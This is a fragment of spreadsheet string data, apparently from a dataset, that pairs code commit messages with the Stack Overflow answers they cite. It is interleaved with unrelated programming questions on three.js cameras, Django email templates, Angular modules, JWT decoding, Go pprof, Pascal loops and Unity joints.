&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then, passed it down to HoverableCube:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;OrbitControls
  makeDefault
  ref={orbitRef}
  enablePan={false}
  enableZoom={true}
  minPolarAngle={Math.PI / 2.2}
  maxPolarAngle={Math.PI / 2.2}
/&amp;gt;
&amp;lt;HoverableCube
  position={[0, -1, 0]}
  moveTo={[5, 3, -5]}
  setLastCameraPosition={setLastCameraPosition}
  controlsRef={orbitRef}  // Passed to cube
/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start="2"&gt;
&lt;li&gt;then Used controlsRef to set the &lt;code&gt;getPolarAngle&lt;/code&gt; and &lt;code&gt;setFromSpherical&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;const handleClick = () =&amp;gt; {
    console.log('cube click. Moving to:', moveTo)
    // for reset button
    setLastCameraPosition([camera.position.x, camera.position.y, camera.position.z])
    // camera transition to x,y,z
    gsap.to(camera.position, {
      x: moveTo[0],
      y: moveTo[1],
      z: moveTo[2],
      duration: 1.5,
      ease: 'power2.out',
    })
   // the code that controls camera look-at
    const target = new THREE.Vector3(position[0], position[1], position[2]);
    let sph = new THREE.Spherical(controlsRef.current.getDistance(),
    controlsRef.current.getPolarAngle(), controlsRef.current.getAzimuthalAngle());
    camera.position.setFromSpherical( sph ).add( target )
    camera.lookAt( target )
   // also tried this
   camera.lookAt(position[0], position[1], position[2])
    controls.target = controls.target || new Vector3();
    controls.target.set(position[0], position[1], position[2]);
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Expected Behavior: The camera moves to moveTo &amp;amp; camera faces the cube at position.
Actual Behavior: The camera moves to moveTo. But it faces (0,0,0), NOT the cube&lt;/p&gt;
&lt;p&gt;ive been tryuing to fix this for the past few days, im going crazy.&lt;/p&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;For reference, this is my HoverableCube function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function HoverableCube({ position, rotation, scale, moveTo, setLastCameraPosition, controlsRef }) {
  const [hovered, setHovered] = useState(false)
  const { camera, controls } = useThree()
  const handleClick = () =&amp;gt; {
    console.log('cube click. Moving to:', moveTo)
    // for reset button
    setLastCameraPosition([camera.position.x, camera.position.y, camera.position.z])
    // camera transition to x,y,z
    gsap.to(camera.position, {
      x: moveTo[0],
      y: moveTo[1],
      z: moveTo[2],
      duration: 1.5,
      ease: 'power2.out',
    })
    const target = new THREE.Vector3(position[0], position[1], position[2]);
    let sph = new THREE.Spherical(controlsRef.current.getDistance(),
    controlsRef.current.getPolarAngle(), controlsRef.current.getAzimuthalAngle());
    camera.position.setFromSpherical( sph ).add( target )
    camera.lookAt( target )
    // Where i'm having issues with. Camera won't look at the position.
    camera.lookAt(position[0], position[1], position[2])
    controls.target = controls.target || new Vector3();
    controls.target.set(position[0], position[1], position[2]);
  }
  return (
    &amp;lt;group&amp;gt;
      {/* Main Cube */}
      &amp;lt;mesh
        castShadow
        receiveShadow
        position={position}
        rotation={rotation}
        scale={scale}
        onPointerOver={() =&amp;gt; setHovered(true)}
        onPointerOut={() =&amp;gt; setHovered(false)}
        onClick={handleClick} // camera click move 
      &amp;gt;
        &amp;lt;boxGeometry args={[1, 1, 1]} /&amp;gt;
        &amp;lt;meshStandardMaterial color=&amp;quot;blue&amp;quot; transparent={false} opacity={0.01} /&amp;gt;
      &amp;lt;/mesh&amp;gt;
      {/* White Outline on Hover */}
      {hovered &amp;amp;&amp;amp; (
        &amp;lt;lineSegments position={position} rotation={rotation} scale={scale}&amp;gt;
          &amp;lt;edgesGeometry attach=&amp;quot;geometry&amp;quot; args={[new THREE.BoxGeometry(1, 1, 1)]} /&amp;gt;
          &amp;lt;lineBasicMaterial attach=&amp;quot;material&amp;quot; color=&amp;quot;white&amp;quot; linewidth={1} /&amp;gt;
        &amp;lt;/lineSegments&amp;gt;
      )}
    &amp;lt;/group&amp;gt;
  )
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;sorry if its too crude just copy n pasting the function&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C306</t>
  </si>
  <si>
    <t>podspec with optional components as subspecs
ToDo: Add OpenSSL static library to AppReceiptVerificator subspec. See:
http://stackoverflow.com/questions/19481125/add-static-library-to-podspe</t>
  </si>
  <si>
    <t>I managed to add the static library as a
subspec
. I prefer this approach because it uses the build shipped with my pod by default, and also enables users to provide their own build if they so desire.
As mentioned, the static library is OpenSSL but the following applies to any static library. I'm using the following directory structure:
libraries/openssl-1.0.1e/include/openssl/*.h
libraries/openssl-1.0.1e/LICENSE
libraries/openssl-1.0.1e/lib/*.a
The resulting subspec would be:
s.subspec 'OpenSSL' do |openssl|
    openssl.preserve_paths = 'libraries/openssl-1.0.1e/include/openssl/*.h', 'libraries/openssl-1.0.1e/include/LICENSE'
    openssl.vendored_libraries = 'libraries/openssl-1.0.1e/lib/libcrypto.a', 'libraries/openssl-1.0.1e/lib/libssl.a'
    openssl.libraries = 'ssl', 'crypto'
    openssl.xcconfig = { 'HEADER_SEARCH_PATHS' =&gt; "${PODS_ROOT}/#{s.name}/libraries/openssl-1.0.1e/include/**" }
end
Line by line:
openssl.preserve_paths = 'libraries/openssl-1.0.1e/include/openssl/*.h', 'libraries/openssl-1.0.1e/include/LICENSE'
Preserve headers and the license file. We will use the headers below.
openssl.vendored_libraries = 'libraries/openssl-1.0.1e/lib/libcrypto.a', 'libraries/openssl-1.0.1e/lib/libssl.a'
Tell CocoaPods that we are shipping the above static libraries in the pod. This will preserve the files, as well as modifying
LIBRARY_SEARCH_PATHS
accordingly.
openssl.libraries = 'ssl', 'crypto'
Includes the libraries in "Other Linker Flags".
openssl.xcconfig = { 'HEADER_SEARCH_PATHS' =&gt; "${PODS_ROOT}/#{s.name}/libraries/openssl-1.0.1e/include/**" }
Tells the project where to find the headers. We cannot use
public_header_files
because this is a
subspec
.</t>
  </si>
  <si>
    <t xml:space="preserve">Assuming a largish template library with around 100 files containing around 100 templates with overall more than 200,000 lines of code. Some of the templates use multiple inheritance to make the usage of the library itself rather simple (i.e. inherit from some base templates and only having to implement certain business rules).
All that exists (grown over several years), "works" and is used for projects.
However, compilation of projects using that library consumes a growing amount of time and it takes quite some time to locate the source for certain bugs. Fixing often causes unexpected side effects or is quite difficult, because some interdependent templates need changing. Testing is nearly impossible due to the sheer amount of functions.
Now, I would really like to simplify the architecture to use less templates and more specialized smaller classes.
Is there any proven way to go about that task? What would be a good place to start?
</t>
  </si>
  <si>
    <t>C307</t>
  </si>
  <si>
    <t>Moved shared components to a shared module DashboardAssets
Needed to use components in different modules
http://stackoverflow.com/questions/39927357/many-modules-using-the-same-component-causes-error-angular-2</t>
  </si>
  <si>
    <t>Yes, components can be declared only in one module, and nor are their access inherited in any way, meaning declaring it in the main app module will not give you access to it in any other module.
If you have a component that is used by other modules, generally they way to go is to put it in a shared module
Include component in a shared module:
@NgModule({
  declarations: [ SharedComponent ],
  exports: [ SharedComponent ]
})
export class SharedModule {}
How to use the shared module elsewhere:
@NgModule({
  imports: [ SharedModule ]
})
class ModuleWithComponentThatUsesSharedComponent {}
See Also
Angular2 How to clean up the AppModule</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to email a copy of my contact form when the form is saved, but the template tags seem to be pulling the full model not just the inputs. I have no idea what I'm doing wrong here.&lt;/p&gt;
&lt;p&gt;My email template.txt file&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Hi! 
You received a message from {{ contact_form.name }} at {{ contact_form.email }}
{{ contact_form.message}}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My views.py&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if request.method == &amp;quot;POST&amp;quot;:
        contact_form = ContactForm(request.POST, request.FILES)
        if contact_form.is_valid():
            contact_form.save(commit=False)
            try:
                contact_form.image_field_1 = request.FILES['image_field_1']
            except:
                contact_form.save()
            try:
                contact_form.image_field_2 = request.FILES['image_field_2']
            except:
                 contact_form.save()                
            contact_form.save()
            subject = 'Website enquiry'
            body = render_to_string(
            'contact_emails/contact_email_body.txt',
            {'contact_form': contact_form,
            })
            send_mail(
               subject,
               body,
               settings.DEFAULT_FROM_EMAIL,
               ['test@gmail.com'],
            )        
            messages.success(request, 
                            &amp;quot;Message received! \
                            We will respond as soon as possible!&amp;quot;)
    else:
        contact_form = ContactForm()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is what arrives in the email&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/3KU4Trgl.jpg" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C308</t>
  </si>
  <si>
    <t>Shadow dom polyfill replaced with Web_components (suggested by Günter
 Zöchbauer here: http://stackoverflow.com/questions/23985539/angular-dart-components-cssurl-not-working-in-internet-explorer)</t>
  </si>
  <si>
    <t>I guess this line causes the problem
&lt;script src="packages/shadow_dom/shadow_dom.min.js"&gt;&lt;/script&gt;
This is deprecated. You should use
&lt;script src="packages/web_components/platform.js"&gt;&lt;/script&gt;
You need to change your pubspec.yaml too (
shadow_dom
to
web_components
)</t>
  </si>
  <si>
    <t xml:space="preserve">The examples I can find use a two layer architecture, where the controllers directly use the repository classes in the data access layer. See [external-link] or [external-link].
Where would you register components from the data access layer if you have a service or business logic layer that uses those components? The data access layer should ideally not be referenced from the user interface layer, right? So Application_Start would not be the right place to do it.
What would be a better way?
Thank you!
</t>
  </si>
  <si>
    <t>C309</t>
  </si>
  <si>
    <t>Added placeholder text to textfields instead of using text lables. (How
to:http://stackoverflow.com/questions/18232097/default-text-placeholder-in-inputtext-component)</t>
  </si>
  <si>
    <t xml:space="preserve">Primefaces provides a placeholder attribute in its latest versions which you can use for p:inputText. Also, there is a p:watermark component which creates a JS based solution for legacy browser compatibility. So you don't definitely need to set a default value into the backing bean. Just use one of the following solutions:
&lt;h:outputLabel value="Search: "/&gt;  
&lt;p:inputText id="search_input_id" value="#{watermarkBean.keyword}" 
    required="true" label="Keyword" placeholder="search" /&gt;  
For legacy browsers:
&lt;h:outputLabel value="Search: "/&gt;  
&lt;p:inputText id="search_input_id" value="#{watermarkBean.keyword}" 
    required="true" label="Keyword" /&gt;  
&lt;p:watermark for="search_input_id" value="search" /&gt;
Also if using JSF 2.2, you can use its passthrough attributes. Adding xmlns:pt="http://xmlns.jcp.org/jsf/passthrough" namespace to your page, you can achieve in the following way, both for JSF h:inputText and Primefaces p:inputText:
&lt;h:inputText value="#{watermarkBean.keyword}"
    pt:placeholder="search" /&gt;
Or wrapping it into the tag with a TagHandler:
&lt;h:inputText value="#{watermarkBean.keyword}"&gt;
    &lt;f:passThroughAttribute name="placeholder"
        value="search"/&gt;
&lt;/h:inputText&gt;
Which creates HTML 5 based input with placeholder attribute:
&lt;input placeholder="search"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As part of looking into &lt;a href="https://stackoverflow.com/questions/79449969/crash-in-cxa-end-catch-on-aix-using-xlclang"&gt;Crash in __cxa_end_catch on AIX using XLClang++&lt;/a&gt;, I tried refactoring my reproducer to avoid using &lt;code&gt;std::exception_ptr&lt;/code&gt;, to see if that would affect anything:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;cstdio&amp;gt;
#include &amp;lt;exception&amp;gt;
#include &amp;lt;future&amp;gt;
#include &amp;lt;thread&amp;gt;
#include &amp;lt;vector&amp;gt;
std::future&amp;lt;std::invalid_argument&amp;gt; GetExceptionFromDeadThread()
{
    return std::async(std::launch::async, []() {
        try
        {
            throw std::invalid_argument(&amp;quot;Some string long enough to allocate on the heap?                                                                                                             &amp;quot;);
        }
        catch (std::invalid_argument e)
        {
            return e;
        }
        catch (...)
        {
            std::fprintf(stderr, &amp;quot;'std::rethrow_exception(future.get())' threw unexpected exception&amp;quot;);
            abort();
        }
    });
}
int main()
{
    try
    {
        constexpr size_t numThreads(100);
        std::vector&amp;lt;std::future&amp;lt;std::invalid_argument&amp;gt;&amp;gt; futures;
        while (true)
        {
            for (size_t i = 0; i &amp;lt; numThreads; ++i)
            {
                futures.push_back(GetExceptionFromDeadThread());
            }
            while (!futures.empty())
            {
                auto&amp;amp; future(futures.back());
                future.wait();
                try
                {
                    throw future.get();
                }
                catch (std::invalid_argument&amp;amp;)
                {
                    std::fputs(&amp;quot;.&amp;quot;, stdout);
                }
                catch (...)
                {
                    std::fprintf(stderr, &amp;quot;'std::rethrow_exception(future.get())' threw unexpected exception&amp;quot;);
                    abort();
                }
                futures.pop_back();
            }
        }
    }
    catch (...)
    {
        std::fprintf(stderr, &amp;quot;Caught unexpected exception&amp;quot;);
        abort();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I noticed, while testing on my Windows development machine (w/ Visual Studio 2022, default-created C++ console project in Debug|x64 configuration), that it was crashing! This disturbs me as I thought I was looking into an issue w/ the AIX compiler/toolchain, but maybe I'm doing something wrong?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;HEAP[exception_ptr_test.exe]: Invalid address specified to
RtlValidateHeap( 0000021A37BB0000, 00007FFFDA43A2F0 )&lt;/p&gt;
&lt;/blockquote&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;   ntdll.dll!RtlpBreakPointHeap()  Unknown
    ntdll.dll!RtlpValidateHeapEntry()   Unknown
    ntdll.dll!RtlValidateHeap() Unknown
    KernelBase.dll!HeapValidate()   Unknown
    ucrtbased.dll!_CrtIsValidHeapPointer(const void * block) Line 1407  C++
    ucrtbased.dll!free_dbg_nolock(void * const block, const int block_use) Line 904 C++
    ucrtbased.dll!_free_dbg(void * block, int block_use) Line 1030  C++
    ucrtbased.dll!free(void * block) Line 32    C++
    vcruntime140d.dll!__std_exception_destroy(__std_exception_data * data) Line 46  C++
    exception_ptr_test.exe!std::exception::~exception() Line 91 C++
    exception_ptr_test.exe!std::logic_error::~logic_error() C++
    exception_ptr_test.exe!std::invalid_argument::~invalid_argument()   C++
    exception_ptr_test.exe!std::_Packaged_state&amp;lt;std::invalid_argument __cdecl(void)&amp;gt;::_Call_immediate() Line 494    C++
    exception_ptr_test.exe!std::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;::{ctor}::__l2::&amp;lt;lambda_1&amp;gt;::operator()() Line 664   C++
    exception_ptr_test.exe!std::invoke&amp;lt;`std::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;&amp;lt;std::_Fake_no_copy_callable_adapter&amp;lt;`GetExceptionFromDeadThread'::`2'::&amp;lt;lambda_1&amp;gt;&amp;gt;&amp;gt;'::`2'::&amp;lt;lambda_1&amp;gt; &amp;amp;&amp;gt;(std::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;::{ctor}::__l2::&amp;lt;lambda_1&amp;gt; &amp;amp; _Obj) Line 1695  C++
    exception_ptr_test.exe!std::_Func_impl_no_alloc&amp;lt;`std::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;&amp;lt;std::_Fake_no_copy_callable_adapter&amp;lt;`GetExceptionFromDeadThread'::`2'::&amp;lt;lambda_1&amp;gt;&amp;gt;&amp;gt;'::`2'::&amp;lt;lambda_1&amp;gt;,void&amp;gt;::_Do_call() Line 874   C++
    exception_ptr_test.exe!std::_Func_class&amp;lt;void&amp;gt;::operator()() Line 920    C++
    exception_ptr_test.exe!Concurrency::details::_MakeVoidToUnitFunc::__l2::&amp;lt;lambda_1&amp;gt;::operator()() Line 2363  C++
    exception_ptr_test.exe!std::invoke&amp;lt;`Concurrency::details::_MakeVoidToUnitFunc'::`2'::&amp;lt;lambda_1&amp;gt; &amp;amp;&amp;gt;(Concurrency::details::_MakeVoidToUnitFunc::__l2::&amp;lt;lambda_1&amp;gt; &amp;amp; _Obj) Line 1696    C++
    exception_ptr_test.exe!std::_Func_impl_no_alloc&amp;lt;`Concurrency::details::_MakeVoidToUnitFunc'::`2'::&amp;lt;lambda_1&amp;gt;,unsigned char&amp;gt;::_Do_call() Line 878    C++
    exception_ptr_test.exe!std::_Func_class&amp;lt;unsigned char&amp;gt;::operator()() Line 921   C++
    exception_ptr_test.exe!Concurrency::task&amp;lt;unsigned char&amp;gt;::_InitialTaskHandle&amp;lt;void,`std::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;&amp;lt;std::_Fake_no_copy_callable_adapter&amp;lt;`GetExceptionFromDeadThread'::`2'::&amp;lt;lambda_1&amp;gt;&amp;gt;&amp;gt;'::`2'::&amp;lt;lambda_1&amp;gt;,Concurrency::details::_TypeSelectorNoAsync&amp;gt;::_LogWorkItemAndInvokeUserLambda&amp;lt;std::function&amp;lt;unsigned char __cdecl(void)&amp;gt;&amp;gt;(std::function&amp;lt;unsigned char __cdecl(void)&amp;gt; _func) Line 3528    C++
    exception_ptr_test.exe!Concurrency::task&amp;lt;unsigned char&amp;gt;::_InitialTaskHandle&amp;lt;void,`std::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;&amp;lt;std::_Fake_no_copy_callable_adapter&amp;lt;`GetExceptionFromDeadThread'::`2'::&amp;lt;lambda_1&amp;gt;&amp;gt;&amp;gt;'::`2'::&amp;lt;lambda_1&amp;gt;,Concurrency::details::_TypeSelectorNoAsync&amp;gt;::_Init(Concurrency::details::_TypeSelectorNoAsync __formal) Line 3548   C++
    exception_ptr_test.exe!Concurrency::task&amp;lt;unsigned char&amp;gt;::_InitialTaskHandle&amp;lt;void,`std::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;&amp;lt;std::_Fake_no_copy_callable_adapter&amp;lt;`GetExceptionFromDeadThread'::`2'::&amp;lt;lambda_1&amp;gt;&amp;gt;&amp;gt;'::`2'::&amp;lt;lambda_1&amp;gt;,Concurrency::details::_TypeSelectorNoAsync&amp;gt;::_Perform() Line 3533   C++
    exception_ptr_test.exe!Concurrency::details::_PPLTaskHandle&amp;lt;unsigned char,Concurrency::task&amp;lt;unsigned char&amp;gt;::_InitialTaskHandle&amp;lt;void,`std::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;::_Task_async_state&amp;lt;std::invalid_argument&amp;gt;&amp;lt;std::_Fake_no_copy_callable_adapter&amp;lt;`GetExceptionFromDeadThread'::`2'::&amp;lt;lambda_1&amp;gt;&amp;gt;&amp;gt;'::`2'::&amp;lt;lambda_1&amp;gt;,Concurrency::details::_TypeSelectorNoAsync&amp;gt;,Concurrency::details::_TaskProcHandle&amp;gt;::invoke() Line 1475   C++
    exception_ptr_test.exe!Concurrency::details::_TaskProcHandle::_RunChoreBridge(void * _Parameter) Line 171   C++
    exception_ptr_test.exe!Concurrency::details::_DefaultPPLTaskScheduler::_PPLTaskChore::_Callback(void * _Args) Line 57   C++
    msvcp140d.dll!Concurrency::details::`anonymous namespace'::_Task_scheduler_callback(_TP_CALLBACK_INSTANCE * _Pci, void * _Args, _TP_WORK * __formal) Line 134   C++
    ntdll.dll!TppWorkpExecuteCallback() Unknown
    ntdll.dll!TppWorkerThread() Unknown
    kernel32.dll!BaseThreadInitThunk()  Unknown
    ntdll.dll!RtlUserThreadStart()  Unknown
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/zOzcozP5.png" rel="noreferrer"&gt;&lt;img src="https://i.sstatic.net/zOzcozP5.png" alt="State of other threads" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Also, changing &lt;code&gt;return e&lt;/code&gt; to &lt;code&gt;return std::invalid_argument(e)&lt;/code&gt; makes the crash go away.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C31</t>
  </si>
  <si>
    <t>feature - delete user modal and current user information to stores
add modal component using teleport
delete user modal component and store
add current user information to stores
https://stackoverflow.com/questions/38552003/how-to-decode-jwt-token-in-javascript-without-using-a-library</t>
  </si>
  <si>
    <t>Note: this does not validate the signature, it just extracts the JSON payload from the token, which could have been tampered with.
Browser
Working unicode text JWT parser function:
function parseJwt (token) {
    var base64Url = token.split('.')[1];
    var base64 = base64Url.replace(/-/g, '+').replace(/_/g, '/');
    var jsonPayload = decodeURIComponent(window.atob(base64).split('').map(function(c) {
        return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
    }).join(''));
    return JSON.parse(jsonPayload);
}
JWT uses base64url (RFC 4648 §5), so using only atob (which uses base64) isn't enough.
Node.js
function parseJwt (token) {
    return JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString());
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When working with FPC 3.2.3 (Lazarus 4.0 RC1) I noticed that the variable handling in &lt;code&gt;for&lt;/code&gt; loops does not work as expected:&lt;/p&gt;
&lt;pre class="lang-pascal prettyprint-override"&gt;&lt;code&gt;procedure TMainForm.ButtonClick(Sender:TObject);
var i:integer;
begin
  for i:=0 to 10 do Log(IntToStr(i));
  Log('@end:'+IntToStr(i));
end;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;outputs:&lt;/p&gt;
&lt;blockquote&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;(compiler optimization level 0):   0 1 2 3 4 5 6 7 8 9 10 @end:10
(compiler optimization level 1):   0 1 2 3 4 5 6 7 8 9 10 @end:10
(compiler optimization level 2):   0 1 2 3 4 5 6 7 8 9 10 @end:10
+ compiler warning @line 449: Locale variable &amp;quot;i&amp;quot; does not seem to be initialized
(compiler optimization level 3):   0 1 2 3 4 5 6 7 8 9 10 @end:0
+ compiler warning @line 449: Locale variable &amp;quot;i&amp;quot; does not seem to be initialized
&lt;/code&gt;&lt;/pre&gt;
&lt;/blockquote&gt;
&lt;p&gt;I would have &lt;strong&gt;expected&lt;/strong&gt; the value &lt;code&gt;11&lt;/code&gt; in the 2nd log (after the end of the loop), just like in C, for example. Can any of you (also in other Lazarus versions) reproduce this?&lt;/p&gt;
&lt;p&gt;To understand my warning: The compiler does its job well, because it warns if the value for &lt;code&gt;i&lt;/code&gt; should not be defined by the optimization. But in principle, &lt;code&gt;i&lt;/code&gt; here is a local variable of the function, i.e. the scope extends from &lt;code&gt;begin&lt;/code&gt; to &lt;code&gt;end&lt;/code&gt;. The &lt;code&gt;for&lt;/code&gt; loop also works with this local variable. And it was instructed to initialize &lt;code&gt;i&lt;/code&gt; with &lt;code&gt;0&lt;/code&gt; (no matter which final value follows). In C, for example, in addition to using a local variable as here, there is also the possibility of defining variables within the loop Ã  la:&lt;/p&gt;
&lt;pre class="lang-c prettyprint-override"&gt;&lt;code&gt;for(int i=0; i&amp;lt; 10; i+= 6) {}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The scope of these variables then of course only refer to the loop body. This is not the case here. &lt;strong&gt;The compiler can and should of course be able to optimize as well as possible.&lt;/strong&gt;  I can't think of a case where a &lt;code&gt;for&lt;/code&gt; loop could be completely optimized away. Constructions such as &lt;code&gt;for i:=0 to -1&lt;/code&gt; (i.e. the execution of the loop never takes place because &lt;code&gt;0&lt;/code&gt; is already greater than &lt;code&gt;-1&lt;/code&gt;) are not possible in FPC. There is &lt;code&gt;downto&lt;/code&gt; for that. In any case, &lt;strong&gt;the compiler can optimize the machine code as much as it wants, as long as the result remains the same&lt;/strong&gt;. And that is not the case here (despite the compiler warning).&lt;/p&gt;
&lt;p&gt;In the following example, a &lt;code&gt;for&lt;/code&gt; loop is exited depending on a variable defined globally outside the function. Here, too, the last value for &lt;code&gt;i&lt;/code&gt; must be retained, regardless of the optimization, because the scope of &lt;code&gt;i&lt;/code&gt; extends over the entire function and &lt;code&gt;i&lt;/code&gt; must be initialized at the start of the &lt;code&gt;for&lt;/code&gt; loop, i.e. before the first possible termination:&lt;/p&gt;
&lt;pre class="lang-pascal prettyprint-override"&gt;&lt;code&gt;var a_global:boolean;
procedure TMainForm.ButtonClick(Sender:TObject);
var i:integer;
begin
  for i:=0 to 10 do begin
    if a_global=true then break;
    Log(IntToStr(i));
  end;
  Log('@end:'+IntToStr(i));
end;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C310</t>
  </si>
  <si>
    <t>strip leading backslash from class names in strings in the Zend\Mvc c
omponent
see http://stackoverflow.com/questions/5072352/instantiating-class-by-string-using-php-5-3-namespaces</t>
  </si>
  <si>
    <t>$class = 'Application\Log\MyClass';
$object = new $class();
The starting \ introduces a (fully qualified) namespaced identifier, but it's not part of the class name itself.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know the best approach to create a [external-link]. Just to be clear, I've also heard it referred to as a canonical information model, semantic information model, and master data model - As far as I can tell, they are all referring to the same concept.
I've heard in the past that a combined "top-down" and "bottom-up" approach is best. This has the advantage of incorporating "Ivory tower" architects and developers - The work will meet somewhere in the middle and usually be both logical and practical. However, this involves bringing in a lot of people with different skill sets.
I've also seen a couple of references to the [external-link], but I can't glean much on best practices in terms of CIM development.
This is something I'm quite interested in getting some feedback on since having a strong CIM is a prerequisite to SOA.
Update
I've heard another strategy goes along with overall SOA implementation: Get the business involved, and seek executive sponsorship. This would be part of the "Top-down" effort. 
</t>
  </si>
  <si>
    <t>C311</t>
  </si>
  <si>
    <t>Wire in pprof handlers.
Based on http://stackoverflow.com/questions/19591065/profiling-go-web-application-built-with-gorillas-mux-with-net-http-pprof
Upstream-commit: 9f46779
Component: engine</t>
  </si>
  <si>
    <t>Sorry for that question.  The answer is in the init() function of pprof.  One just need to add 4 functions from pprof to the mux router.  Here is the fixed code from above.
package main
import (
	"fmt"
	"github.com/gorilla/mux"
	"math"
	"net/http"
)
import "net/http/pprof"
func AttachProfiler(router *mux.Router) {
	router.HandleFunc("/debug/pprof/", pprof.Index)
	router.HandleFunc("/debug/pprof/cmdline", pprof.Cmdline)
	router.HandleFunc("/debug/pprof/profile", pprof.Profile)
	router.HandleFunc("/debug/pprof/symbol", pprof.Symbol)
}
func SayHello(w http.ResponseWriter, r *http.Request) {
	for i := 0; i &lt; 1000000; i++ {
		math.Pow(36, 89)
	}
	fmt.Fprint(w, "Hello!")
}
func main() {
	r := mux.NewRouter()
	AttachProfiler(r)
	r.HandleFunc("/hello", SayHello)
	http.ListenAndServe(":6060", r)
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to unity and am trying to create a script to link every game object in a list to each other object in the list with spring joint. as I implied in the title I am working in 2D.&lt;/p&gt;
&lt;p&gt;My code I wrote for it, the list is decclared and filled earlier and I can confirm that the list is filled properly.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (int i = 0; i &amp;lt; softVertexList.Count; i++)
{
    for (int n = 0; n &amp;lt; softVertexList.Count;n++)
    {
        if (i == n)
        {
        }
        else
        {         
            softVertexList[i].AddComponent(typeof(SpringJoint2D));
            softVertexList[i].GetComponent&amp;lt;SpringJoint2D&amp;gt;().connectedBody = softVertexList[n].GetComponent&amp;lt;Rigidbody2D&amp;gt;();
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I post this here because when I run the program it only attaches a spring joint between each object and the last object in the list. It makes all the joints but only attaches one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C312</t>
  </si>
  <si>
    <t>Implement Context Switch
Used this for reference to get started on the assembly component:
https://stackoverflow.com/questions/25199802/switching-context-inside-an-isr-on-cortex-m?rq=1.
I was stuck for a while trying to figure out how to access the PSP in Handler mode and the proper syntax for STMDB, as I have not used assembly very often.
Also modified task creation based on a better understanding of how the
context switch works</t>
  </si>
  <si>
    <t>It is indeed quite complicated. I am writing a book about the FreeRTOS operating system running on Cortex-M cores. I have written a chapter about this. From reading your question I believe this chapter will help you:</t>
  </si>
  <si>
    <t xml:space="preserve">Lets say I need to write several functions processing some data. These functions are performing a single task - some mathematical calculations. I suppose there is no need to combine them with some data members.
Shall I use:
a class without data members and declare these functions as static methods so I can use them without creating class object,
or an anonymous namespace,
or maybe I need something more complicated in terms of architecture and design?
Actually, the language I am writing in is C++, but I think this question doesn't depend on what the language of development is.
</t>
  </si>
  <si>
    <t>C313</t>
  </si>
  <si>
    <t>fix private properties and test that they get initialised
angular components should not have private properties as components are called from an outside scope.
https://stackoverflow.com/a/39000046/4908847</t>
  </si>
  <si>
    <t>UPD: Since Angular 14, it is possible to bind protected components members in the template. This should partially address the concern of exposing internal state (which should only be accessible to the template) as the component's public API.
No, you shouldn't be using private variables in your templates.
While I like the drewmoore's answer and see perfect conceptual logic in it, implementationwise it's wrong. Templates do not exist within component classes, but outside of them. Take a look at this repo for the proof.
The only reason why it works is because TypeScript's private keyword doesn't really make member private. Just-in-Time compilation happens in a browser at runtime and JS doesn't have any concept of private members (yet?). Credit goes to Sander Elias for putting me on the right track.
With ngc and Ahead-of-Time compilation, you'll get errors if you try accessing private members of the component from template. Clone demonstration repo, change MyComponent members' visibility to private  and you will get compilation errors, when running ngc. Here is also answer specific for Ahead-of-Time compilation.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When working with React and the endless VSCode libraries we got used to tracking files and components with cmd+click (at least I did).&lt;/p&gt;
&lt;p&gt;However, when working with Laravel (in a new VSCode profile) I couldn't activate this tracking functionality.&lt;/p&gt;
&lt;p&gt;attempts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;âœ… Intelephense PHP extension&lt;/li&gt;
&lt;li&gt;âœ… Add an alias in &lt;code&gt;settings.json&lt;/code&gt;&lt;/li&gt;
